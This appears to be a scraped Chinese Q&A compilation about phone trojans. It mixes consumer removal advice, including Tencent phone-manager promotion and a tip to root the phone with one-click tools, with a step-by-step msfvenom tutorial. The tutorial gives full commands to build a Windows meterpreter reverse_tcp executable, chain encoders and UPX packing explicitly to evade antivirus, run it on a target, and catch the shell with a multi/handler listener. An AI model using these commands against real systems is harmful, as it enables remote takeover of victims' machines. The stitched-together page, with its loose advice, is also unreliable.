手机被植入木马程序该怎么办?
很多手机病毒会伪装为正常软件或者诱惑性名称,若怀疑手机中存在木马或者病毒,一般的表现是手机自动下载其他推广软件、手机卡顿发热、出现有遮挡的广告等。请尝试按照以下步骤进行清除:
请尝试安装一款安全软件(例如:手机管家等)。以手机管家为例,打开手机管家,点击主界面上的一键体检即可自动检测手机中存在的问题,并且给出处理建议,点击一键清除即可删除病毒程序。
若重启手机发现病毒依然存在或者提示无法删除,请先获取ROOT权限再进行深度查杀,获取ROOT可以使用电脑端的一键ROOT工具进行。
植入木马程序的方法有哪几种?
木马的植入最常见的方法
1、通过网页的植入,比如某带木马代码的网站,你登录后,他就自动加载在你的系统里了。一般他们会把木马放在图片里
2、木马可以通过程序的下载进行植入
例如通过提供免费的下载或者下载列表里下载的程序和实际你搜索到的程序不同,提供的是木马程序,或者干脆在程序里添加木马
3、人工植入,
早期很多人针对网游投放木马,而网游人数最密集的地方就是网吧,通常会有人带U盘到网吧,植入,或者通过自己建的某个带有木马的网站,在网吧登录木马网站进行木马的侵入
4、通过破解防火墙,指定IP进行攻击的植入
这个对一般老板姓来说都是传说中黑客的手段,一般不太会出现在生活中,谁会为了植入某一个个人电脑花费大量的精力来干这事,理论上是找到IP,并且打开系统后面,直接投放,不过能做到的人们,没有精力来做这种事
如何用msfvenom生成木马程序
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.
二,工具:MSF
三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
四,过程:
1,查看帮助
命令: root# msfvenom -h
结果:
2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o
结果:
3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe abc.exe
注:如果只是用msfpayload生成,简单示例:
命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.113 X Desktop/abc.exe
多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acn.exe
upx加壳:upx -5 /root/Desktop/acn.exe
结果:
说明: -p payload
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
LHOST,LPORT 监听上线的主机IP和端口
-f exe 生成EXE格式
4,把生成的abc.exe放到win7下.执行.
5,在命令行下,打开msfconsole.
命令: root # msfconsole
6,本机监听,因为之前用的是reverse_tcp,所以设置如下
命令: msf use exploit/multi/handler
Msf exploit(handler) set payload windows/meterpreter/reverset_tcp
结果:
7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来.
8,.验证
手机被植入木马病毒如何处理
这个可以安装杀毒软件杀毒,我一直用的腾讯手机个就不错。
它可以自动更新病毒库,杀毒防护二合一。我的手机也是安卓系统的,
之前换了几个杀毒软件了,现在一直用的是腾讯手机管家,用来用去,
还是觉得他比较符合我的口味,功能齐全,杀毒方便,你也可以多试几个,总有一个适合你。腾讯手机管家能有效清除侵入您手机中的恶意软件和病毒。
apk软件如果有木马病毒,在电脑上安全软件能查出来吗
您好,理论上可以检查出来。
如果软件有毒,但是又不得不用,您可以在杀毒软件的安全沙箱中运行。
腾讯电脑管家企业平台:http://zhidao.baidu.com/c/guanjia/
资料.apk木马
手机中毒后一般的表现是手机自动下载其他推广软件、手机卡顿发热、出现有遮挡的广告等。甚至会拦截正常的银行短信导致用户的账号被盗,银行卡被盗刷等。若怀疑手机中存在木马或者病毒,请尝试按照以下步骤进行清除:
请尝试安装一款安全软件(例如:手机管家等)。以手机管家为例,打开手机管家,点击主界面上的一键体检即可自动检测手机中存在的问题,并且给出处理建议,点击一键清除即可删除病毒程序。
都无法进行解决请尝试到手机品牌官网下载刷机包和工具对手机进行完整恢复,若无法自行处理请送到手机品牌官方售后进行维修。
apk文件是木马病毒,传到电脑里,被检测出来了,可以不删除吗?不删对电脑系统有危害吗?
没有运行的病毒是不会对系统和其它软件产生危害的。
没有运行,那么它就只是一段占据了部分存储空间的数据而已。
再加上APK格式的文件,只能在手机安卓系统的环境下运行,并不能在Windows系统环境下运行,对电脑是没有影响的。
不删除其实也没什么关系的。